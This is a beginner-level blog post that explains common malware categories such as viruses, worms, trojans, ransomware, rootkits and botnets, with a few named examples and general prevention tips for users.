Open in app

Sign in

Write

Sign in

Malware and its types…

Ajay Krishna
BeyondX
Published in
7 min readAug 22, 2020

What is malware?

The term malware (the short form of malicious software) used to refer to a variety of forms of hostile or intrusive software. Malware is any piece of software that was written with the intent of damaging devices (like a server, a client, or any computer network), stealing data, and generally causing a mess. Like the human flu, it interferes with normal functioning.

Although malware cannot damage the physical hardware of systems or network equipment, it can steal, encrypt, or delete your data, alter or hijack core computer functions, and spy on your computer activity without your knowledge or permission.

It is one of the biggest threats on the internet!

So, it’s crucial that users know how to recognize the different types of malware in order to help protect yourself, and your business systems, from being compromised. While some are well-known (at least by name), others are less well understood.

Most common types of malware are:

Virus

A computer virus is what most of the media and regular end-users call every malware program reported in the news. Fortunately, most malware programs aren’t viruses.

A computer virus is a type of computer program that, when executed, replicates itself by modifying other computer programs and inserting its own code. When this replication succeeds, the affected areas are then said to be “infected” with a computer virus. A computer virus requires human action to spread to other computers and is often spread through email attachments and internet downloads.

However, pure computer viruses are uncommon today, comprising less than 10 percent of all malware. That is a good thing because viruses are the only type of malware that “infects” other files. The antivirus software will look for the legitimate program causing it and will execute it, but if a file is infected, simply will delete or quarantine the infected file (so it becomes useless)!

Worms

Worms are a type of malware similar to viruses, self-replicating in order to spread to other computers over a network, usually causing harm by destroying data and files. Unlike viruses, worms don’t need human interaction to spread.

Since they can spread fast, worms are often used to execute a payload — a piece of code that can cause damage to a system. Payloads can delete files on a host system, encrypt data for a ransomware attack, steal information, delete files, and create botnets.

Keyloggers

Keystroke logging often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard. Keyloggers are a serious threat to users and the users’ data, as they track the keystrokes to intercept passwords and other sensitive information typed in through the keyboard. This gives hackers the benefit of access to PIN codes and account numbers, passwords to online shopping sites, email ids, email logins, and other confidential information, etc.

Adware

Adware is unwanted software designed to throw advertisements up on your screen, most often within a web browser. Typically, it uses an underhanded method to either disguise itself as legitimate, or piggyback on another program to trick you into installing it on your PC, tablet, or mobile device.

Thankfully adware isn’t difficult to spot. One of the easiest ways to identify adware is if you constantly see the same ad on different websites you visit, or if you’re seeing a lot of aggressive pop-up ads. To be clear: just because you see an annoying ad does not mean it is adware.

Spyware

Spyware is malware that gathers information about a person or organization, sometimes without their knowledge, and sends the information to the attacker without the victim’s consent. These spying capabilities can include activity monitoring, collecting keystrokes, data harvesting (account information, logins, financial data), and more.

For example, DarkHotel, which targeted business and government leaders using hotel WIFI, used several types of malware in order to gain access to the systems belonging to specific powerful people. Once that access was gained, the attackers installed keyloggers to capture their target’s passwords and other sensitive information.

Adware and spyware programs are usually the easiest to remove, often because they aren’t nearly as nefarious in their intentions as other types of malware.

Trojan Horse

Referred to as “Trojans”, disguises itself as desirable code or software. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Cybercriminals deliver Trojans in the guise of routine software that persuades a victim to install it on their computer.

Trojans are generally spread with social engineering, such as phishing. For example, a user may be tricked into executing an email attachment disguised to appear genuine (e.g. an Excel spreadsheet). Once the executable file is opened, the trojan is installed. Once the disguised malware infiltrates the network, any data can be stolen. Often, the Trojan horse malware can act as spyware, too, allowing hackers to spy on your actions.

Ransomware

Ransomware does exactly what its name describes — holds your computer or device under the hacker’s control in an effort to gain ransom money. It has been a huge percentage of the malware for the last few years, and the percentage is still growing. Ransomware has often crippled companies, hospitals, police departments, and even entire cities.

Ransomware (often a trojan), spreads through phishing emails, malvertising, visiting infected websites or by exploiting vulnerabilities.

Ransomware can be prevented just like every other type of malware program, but once executed, it can be hard to reverse the damage without a good, validated backup. According to some studies, about a quarter of the victims pay the ransom, and of those, about 30 percent still do not get their files unlocked.

Rootkit

A rootkit is a collection of malware designed to give unauthorized access to a computer or area of its software and often masks its existence or the existence of other software. Once a rootkit has been installed it is possible for the malicious party behind the rootkit to remotely execute files, access/steal information, Rootkit prevention, detection, and removal can be difficult due to their stealthy operation. Rootkit detection relies on manual methods such as monitoring computer behavior for irregular activity, signature scanning, and storage dump analysis. For example, Zacinlo infects systems when users download a fake VPN app. Once installed, Zacinlo conducts a security sweep for competing malware and tries to remove it.

When a rootkit is discovered, some experts recommend completely wiping your hard drive and reinstalling everything from scratch.

Botnets

A bot is a computer that is infected with malware that allows it to be remotely controlled by an attacker. Bots can self-replicate (like worms) or replicate via user action (like viruses and Trojans), which then become part of a botnet. An entire network of compromised devices is known as a botnet.

Affected regions of Mirai Botnet

This “botnet” is then used to launch broad remotely-controlled floods of attacks, such as DDoS attacks. Botnets can become quite expansive. For example, the Mirai IoT botnet ranged from 800,000 to 2.5M computers.

Fileless Malware

Fileless malware isn’t really a different category of malware, but more of a description of how they exploit and persevere. Over 50 percent of today’s malware is fileless malware. They travel and infect without directly using files or file systems. Such malware exploits and spread in memory only; they also spread using ‘non-file’ OS objects, like APIs, registry keys, etc.

The end result is that fileless attacks are harder to detect and stop. If you aren’t already very familiar with common fileless attack techniques and programs, you probably should be if you want a career in computer security!

How can we avoid malware?

Now that you know about the common types of malware, you also need to know to avoid or prevent them. Here are some tips you can follow:

  • Purchase, run, and constantly update anti-malware or anti-virus software.
  • Keep your Operating System, drivers, plugins, etc. updated.
  • Never open, click, or download anything that you deem too suspicious, like files, ads, emails, etc.
  • Practice safe browsing.
  • Have strong passwords, change passwords periodically.
  • Also, be wary of social engineering attacks.
Cybersecurity
Hacking
Virus
Internet
Malware

--

--

Ajay Krishna
BeyondX

Written by Ajay Krishna

12 Followers
Editor for

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams